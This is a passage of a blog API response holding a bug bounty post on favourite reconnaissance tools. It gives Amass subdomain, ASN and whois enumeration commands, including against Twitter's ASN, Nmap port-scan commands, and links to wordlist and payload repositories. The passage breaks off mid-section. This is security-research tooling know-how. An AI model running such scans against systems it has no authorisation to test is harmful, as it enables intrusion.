GET /api/v1/blogs/list?page=1
HTTP 200 OK
Allow: GET, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "count": 23,
    "total_pages": 2,
    "results": [
        {
            "title": "Essential RECON Tools",
            "blog_id": "essential-recon-tools",
            "author": "Anshuman Pattnaik",
            "published_date": "2021-08-23T19:36:17.154823Z",
            "last_updated_date": "2021-08-23T22:23:12.533690Z",
            "seo_thumbnail": "https://assets.hackbotone.com/assets/essential-recon-tools/seo_thumbnail.png",
            "small_thumbnail": "https://assets.hackbotone.com/assets/essential-recon-tools/small_thumbnail.png",
            "thumbnail": "https://assets.hackbotone.com/assets/essential-recon-tools/large_thumbnail.png",
            "keywords": [
                "Bug Bounty",
                "RECON",
                "Web Security"
            ],
            "highlights": "In this article, I'll discuss my favourite recon tools, which I often use in Bug Bounty. A few years ago, I posted a Twitter post sharing my RECON steps for Bug Bounty with essential tools. That post got some serious attention, and people from all over the world in security saw it. The thread got more than 40,000 views, and people are still following it today, which I really appreciate.",
            "description": "<font size=\"4\">In this article, I'll discuss my&nbsp;</font><font size=\"4\">favourite recon tools, which I often use in Bug Bounty. A few years ago, I posted a Twitter post sharing my RECON steps for Bug Bounty with essential tools. That post got some serious attention, and people from all over the world in the InfoSec community saw it. The thread got more than <font color=\"#45b8ac\"><b>40,000</b></font> views, and people are still following it today, which I really appreciate.</font><div><br></div><div><script async=\"\" src=\"/static/js/widgets.js\" charset=\"utf-8\"></script>\n<div class=\"twitter-tweet twitter-tweet-rendered\" style=\"display: flex; max-width: 550px; width: 100%; margin-top: 10px; margin-bottom: 10px;\"><iframe id=\"twitter-widget-1\" scrolling=\"no\" frameborder=\"0\" allowtransparency=\"true\" allowfullscreen=\"true\" class=\"\" style=\"position: static; visibility: visible; width: 550px; height: 465px; display: block; flex-grow: 1;\" title=\"Twitter Tweet\" src=\"https://platform.twitter.com/embed/Tweet.html?dnt=false&amp;embedId=twitter-widget-1&amp;features=eyJ0ZndfZXhwZXJpbWVudHNfY29va2llX2V4cGlyYXRpb24iOnsiYnVja2V0IjoxMjA5NjAwLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X2hvcml6b25fdHdlZXRfZW1iZWRfOTU1NSI6eyJidWNrZXQiOiJodGUiLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X3NwYWNlX2NhcmQiOnsiYnVja2V0Ijoib2ZmIiwidmVyc2lvbiI6bnVsbH19&amp;frame=false&amp;hideCard=false&amp;hideThread=false&amp;id=1183269184052088832&amp;lang=en&amp;origin=https%3A%2F%2Fadmin.hackbotone.com%2Fhackbotone-admin-internal-admin-app%2Fupdate-blog%2Fessential-recon-tools&amp;sessionId=54d94674ed18de14c1a56c0b2cc7d6a8f8cd1ab1&amp;theme=light&amp;widgetsVersion=1890d59c%3A1627936082797&amp;width=550px\" data-tweet-id=\"1183269184052088832\"></iframe></div></div><div><br></div><div><font size=\"4\">So, I thought to make a blog post about it and explain my favourite recon tools, so it will be more helpful to everyone why RECON is essential 
during Bug Hunting?&nbsp;</font><span style=\"font-size: large;\">There are some new tools I have added to my RECON. I'll update this list once I explore new tools.</span></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">Let's discuss all the tooling.</font></div><div><font size=\"4\"><br></font></div><div><b style=\"\"><font size=\"5\">Tools</font></b></div><div><ul><li style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><font size=\"4\">Amass - (Subdomain Enumeration, ASN Enumeration)</font></span></li><li style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><font size=\"4\">Nmap - (Port Scanning, OS Detection and many more)</font></span></li><li style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt; list-style-type: 
disc;\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><font size=\"4\">Wappalyzer Chrome Extension - (Identify technologies on websites)</font></span></li><li style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><font size=\"4\">FFuF/Dirsearch - (Content Discovery)</font></span></li><li style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><font size=\"4\">Wordlists/Payloads - (SecLists &amp; PayloadsAllTheThings)</font></span></li><li style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt; list-style-type: 
disc;\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><font size=\"4\">Turbo Intruder - (Race Condition/HTTP Request Smuggling)</font></span></li><li style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><font size=\"4\">Param Miner - (Web cache poisoning)</font></span></li><li style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><font size=\"4\">Burp Collaborator - (Blind SSRF Exploits &amp; Command Injection)</font></span></li><li style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt; list-style-type: 
disc;\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><font size=\"4\">SQLmap - (SQL Injection)</font></span></li></ul><div><font color=\"#0e101a\"><b style=\"\"><font size=\"5\"><br></font></b></font></div><div><font color=\"#0e101a\"><b style=\"\"><font size=\"5\">Amass</font></b></font></div></div><div><font color=\"#0e101a\"><b style=\"\"><font size=\"5\"><br></font></b></font></div><div><font color=\"#0e101a\" size=\"4\">During subdomain enumeration and information gathering about a target, I always use this tool because it has so many options for finding serious information about the target, such as ASN information, IPv4/IPv6 discovery, concurrent DNS queries, subdomain brute forcing, asset discovery, etc. This is the one tool you should spend more time on during RECON, trying to collect as many subdomains as you can.</font><br></div><div><font color=\"#0e101a\" size=\"4\"><b style=\"\"><br></b></font></div><div><strong style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"4\" style=\"\">Essential Commands</font></strong></div><div> <script async=\"\" src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\"></script><div><div> \n<script async=\"\" src=\"/static/js/widgets.js\" charset=\"utf-8\"></script><div> \n<script async=\"\" src=\"/widgets.js\" charset=\"utf-8\"></script><div> \n<script async=\"\" src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\"></script><div> \n<script async=\"\" src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\"></script><div><div 
class=\"code-toolbar\"><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Cop</button></div></div></div></div></div></div></div></div></div></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">amass <span class=\"token keyword\">enum</span> <span class=\"token operator\">-</span>d example<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span>\namass <span class=\"token keyword\">enum</span> <span class=\"token operator\">-</span>active <span class=\"token operator\">-</span>d example<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span> <span class=\"token operator\">-</span>p <span class=\"token number\">80</span><span class=\"token punctuation\">,</span><span class=\"token number\">443</span><span class=\"token punctuation\">,</span><span class=\"token number\">8080</span>\namass <span class=\"token keyword\">enum</span> <span class=\"token operator\">-</span>ipv4 <span class=\"token operator\">-</span>d example<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span>\namass <span class=\"token keyword\">enum</span> <span class=\"token operator\">-</span>ipv6 <span class=\"token operator\">-</span>d example<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span>\namass <span class=\"token keyword\">enum</span> <span class=\"token operator\">-</span>brute <span class=\"token operator\">-</span>min<span class=\"token operator\">-</span><span class=\"token keyword control-flow\">for</span><span class=\"token operator\">-</span>recursive <span class=\"token number\">3</span> <span class=\"token operator\">-</span>d example<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div></div><div><h2 style=\"color: rgb(14, 
16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><font size=\"4\"><br></font></span></h2><h2 style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><font size=\"4\">Reverse Whois</font></span></h2></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">amass intel <span class=\"token operator\">-</span>d example<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span> <span class=\"token operator\">-</span>whois</code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><b><font size=\"4\">Identify subdomains by reading SSL/TLS certificates.</font></b></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">amass intel <span class=\"token operator\">-</span>active <span class=\"token operator\">-</span>cidr  <span class=\"token number\">93.184</span><span class=\"token number\">.216</span><span class=\"token 
number\">.34</span><span class=\"token operator\">/</span><span class=\"token number\">24</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><b><font size=\"4\">ASNs</font></b></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">amass intel <span class=\"token operator\">-</span>org <span class=\"token string\">\"Twitter\"</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">amass intel <span class=\"token operator\">-</span>active <span class=\"token operator\">-</span>asn <span class=\"token number\">54888</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><b><font size=\"4\">ASN Reverse Whois</font></b></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">amass intel <span class=\"token operator\">-</span>asn <span class=\"token number\">54888</span> <span class=\"token operator\">-</span>whois  <span class=\"token operator\">-</span>d twitter<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><div><strong style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"4\">APIs</font></strong></div><div><strong style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; 
background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><span style=\"color: rgb(0, 0, 0); font-weight: 400;\"><font size=\"4\">Amass collects subdomains from various sources, and all of these sources require API keys. If you set up an account on each of these platforms and get an API key, your chances of collecting a large number of subdomains are always high.</font></span></strong></div><div><strong style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><span style=\"color: rgb(0, 0, 0); font-weight: 400;\"><font size=\"4\"><br></font></span></strong></div><div><strong style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><span style=\"color: rgb(0, 0, 0);\"><font size=\"4\" style=\"\">Data Sources</font></span></strong></div><div><div class=\"code-toolbar\"><pre class=\" language-js\">AlienVault, Anubis, BinaryEdge, BGPView, BufferOver, C99, Chaos, CIRCL, Cloudflare, CommonCrawl, DNSDB, GitHub, HackerTarget, Hunter, IPinfo, Mnemonic, NetworksDB, \nPassiveTotal, RADb, ReconDev, Robtex, SecurityTrails, ShadowServer, Shodan, SonarSearch, Spyse, Sublist3rAPI, TeamCymru, ThreatBook, ThreatCrowd, ThreatMiner, \nTwitter, Umbrella, URLScan, VirusTotal, WhoisXMLAPI, ZETAlytics, ZoomEye</pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><font size=\"4\">Once your accounts are ready, put all of the API keys into a config.ini file. Y</font><span style=\"font-size: large;\">ou can refer 
to the example config.ini file from here&nbsp;</span><span style=\"font-size: large;\">- </span><a href=\"https://github.com/OWASP/Amass/blob/master/examples/config.ini\" style=\"font-size: large;\"><font color=\"#dd4124\">Example Config.ini</font></a></div><div><b><br></b></div><div><b><font size=\"4\">Config Command</font></b></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">amass <span class=\"token keyword\">enum</span> <span class=\"token operator\">-</span>d example<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span> <span class=\"token operator\">-</span>config config<span class=\"token punctuation\">.</span><span class=\"token property-access\">ini</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div></div></div><div><br></div><div><font size=\"4\"><b>GitHub Project</b>&nbsp;-&nbsp;</font><a href=\"https://github.com/OWASP/Amass\"><font color=\"#dd4124\"><b>OWASP/Amass</b></font></a></div><div><br></div><div><strong style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"5\">Nmap</font></strong><br></div><div><strong style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"5\"><br></font></strong></div><div><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font 
style=\"\"><font color=\"#0e101a\" size=\"4\">Below are the Nmap commands I mostly use during my scanning phase.</font><br></font></span></div><div><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font style=\"\"><font color=\"#0e101a\" size=\"4\"><br></font></font></span></div><div><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font style=\"\"><p style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><span style=\"font-size: large;\"><b>Checking that the target host is reachable</b></span><br></p></font></span></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">nmap <span class=\"token operator\">-</span>sn <span class=\"token number\">93.184</span><span class=\"token number\">.216</span><span class=\"token number\">.34</span><span class=\"token operator\">/</span><span class=\"token number\">24</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><font size=\"4\"><b>Scan all ports</b></font></div><div><div class=\"code-toolbar\"><pre class=\" language-js\">nmap -p 1-65535 www.example.com<br></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><font size=\"4\"><b>Full TCP port scan with service version detection</b></font></div><div><div 
class=\"code-toolbar\"><pre class=\" language-js\">nmap -p 1-65535 -sV -sS -T4 www.example.com<br></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><strong style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"5\">Wappalyzer</font>&nbsp;</strong></div><div><strong style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><br></strong></div><div><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font color=\"#0e101a\" size=\"4\">Wappalyzer is one of the best tools to identify the technology behind a website. 
I highly recommend using this tool, and it's available for both Chrome &amp; Firefox as an extension.</font><br></span></div><div><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font color=\"#0e101a\" size=\"4\"><br></font></span></div><div><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"4\"><b style=\"\">Extensions</b></font></span></div><div><ul><li><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"4\"><font color=\"#dd4124\"><b style=\"\"><a href=\"https://chrome.google.com/webstore/detail/wappalyzer/gppongmhjkpfnbhagpmjfkannfbllamg?hl=en\" style=\"\"><font color=\"#dd4124\">Chrome</font></a></b></font></font></span></li><li><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"4\"><font color=\"#dd4124\"><b style=\"font-size: medium;\"><font size=\"4\" style=\"\"><a href=\"https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/\" style=\"\"><font color=\"#dd4124\">Firefox&nbsp;</font></a></font></b></font></font></span></li></ul></div><div><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; 
background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><div><strong style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"5\"><br></font></strong></div><div><strong style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"5\">FFuF/Dirsearch</font></strong><br></div><div><strong style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"5\"><br></font></strong></div><div><span data-preserver-spaces=\"true\" style=\"font-size: large; color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\">I use&nbsp;</span><span style=\"font-size: large; color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" 
data-preserver-spaces=\"true\">ffuf/dirsearch&nbsp;</span></span><span data-preserver-spaces=\"true\" style=\"font-size: large; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font color=\"#0e101a\">for content discovery, and both the tools are great and easy to use. I recommend using the </font><a href=\"https://github.com/danielmiessler/SecLists\"><font color=\"#dd4124\">SecLists</font></a><font color=\"#0e101a\"> wordlists repository during fuzzing.&nbsp;</font></span><br></div><div><span style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"4\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><br></span></font></span></div><div><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><div style=\"font-size: large; color: rgb(14, 16, 26);\"><b>GitHub Projects</b>&nbsp;</div><div style=\"\"><ul style=\"font-size: large;\"><li><a 
href=\"https://github.com/ffuf/ffuf\"><font color=\"#dd4124\"><b>ffuf</b></font></a></li><li style=\"\"><a href=\"https://github.com/maurosoria/dirsearch\" style=\"\"><font color=\"#dd4124\"><b>dirsearch</b></font></a></li></ul><div style=\"font-size: large;\"><br></div><div style=\"\"><span style=\"color: rgb(14, 16, 26);\"><font size=\"5\"><b>Wordlists/Payloads</b></font></span><br></div><div style=\"\"><span style=\"color: rgb(14, 16, 26);\"><font size=\"5\"><b><br></b></font></span></div><div style=\"\"><p style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><strong style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"4\">SecLists</font></strong></p><p style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"></p><ul style=\"\"><li style=\"\"><strong style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><a href=\"https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content\" style=\"\"><font color=\"#dd4124\">Web-Content</font></a></strong><span data-preserver-spaces=\"true\" style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; 
background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"></span></li><li style=\"\"><b><a href=\"https://github.com/danielmiessler/SecLists/tree/master/Discovery/Variables\"><font color=\"#dd4124\">Variables</font></a></b></li><li style=\"\"><b><a href=\"https://github.com/danielmiessler/SecLists/tree/master/Usernames\"><font color=\"#dd4124\">Usernames</font></a></b></li><li style=\"\"><b><a href=\"https://github.com/danielmiessler/SecLists/tree/master/Passwords\"><font color=\"#dd4124\">Passwords</font></a></b></li></ul><div><b>Payloads</b></div><div><ul><li><b><a href=\"https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/API%20Key%20Leaks\"><font color=\"#dd4124\">API Key Leaks</font></a></b><br></li><li><b><a href=\"https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal\"><font color=\"#dd4124\">Directory traversal</font></a></b><br></li><li><b><a href=\"https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection\"><font color=\"#dd4124\">Templates Injections</font></a></b></li><li><b><a href=\"https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/JSON%20Web%20Token\"><font color=\"#dd4124\">JWT - JSON Web Token</font></a></b><br></li><li><b><a href=\"https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/OAuth\"><font color=\"#dd4124\">OAuth</font></a></b><br></li><li><b><a href=\"https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect\"><font color=\"#dd4124\">Open URL Redirection</font></a></b><br></li><li><b><a href=\"https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery\"><font color=\"#dd4124\">Server-Side Request Forgery</font></a></b><br></li><li><b><a href=\"https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files\"><font color=\"#dd4124\">Upload Insecure Files</font></a></b><br></li><li><b><a 
href=\"https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection\"><font color=\"#dd4124\">XML External Entity</font></a></b><br></li><li><b><a href=\"https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CORS%20Misconfiguration\"><font color=\"#dd4124\">CORS Misconfiguration</font></a></b><br></li></ul><div><span style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><b><font size=\"5\"><br></font></b></span></div><div><span style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><b><font size=\"5\">Turbo Intruder</font></b></span><br></div></div><div><span style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><b><font size=\"5\"><br></font></b></span></div><div><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><div style=\"font-size: large;\"><font color=\"#0e101a\">It is one more burp extension coded by </font><a href=\"https://twitter.com/albinowax\"><font color=\"#dd4124\">James Kettle - @albinowax</font></a><font color=\"#0e101a\">. And the purpose of this tool is to send faster HTTP requests around (<i>30,000 requests per second</i>). 
